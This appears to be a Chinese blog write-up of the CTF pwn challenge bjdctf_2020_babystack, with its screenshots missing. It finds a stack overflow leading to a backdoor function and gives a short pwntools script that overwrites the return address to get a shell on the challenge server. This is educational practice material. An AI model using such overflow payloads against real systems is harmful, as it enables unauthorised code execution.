当前位置:网站首页>bjdctf_2020_babystack

bjdctf_2020_babystack

2022-07-23 23:28:00 长街395

文章目录

一、查看文件

在这里插入图片描述在这里插入图片描述
64位,保护基本未开

二、IDA反编译

我们放到ida 中再看看代码
在这里插入图片描述
初步判断栈溢出

接着看有个backdoor函数:
在这里插入图片描述有个system系统调用函数,
栈溢出实捶
我们找到command地址
在这里插入图片描述buf 10字节就可以溢出
在这里插入图片描述
在这里插入图片描述

所以可以构造代码了。

三、代码

from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",25122)

p=b"a"*(0x10+0x08)+p64(0x4006e6)
r.sendline(str(len(p) + 1))
r.recvuntil('name?')
r.sendline(p)
r.interactive()

在这里插入图片描述
在这里插入图片描述

总结

虽然只是一道基础的栈溢出题目,我其实很激动,因为其他的博客里我多多少少是参照了其他大佬的思维,这道题,也算证明了菜狗子的训练是有效的,起码碰到类似的题目也可以尝试做了。嘻嘻,加油吧。

原网站

版权声明
本文为[长街395]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_56301399/article/details/125941703

边栏推荐

猜你喜欢

随机推荐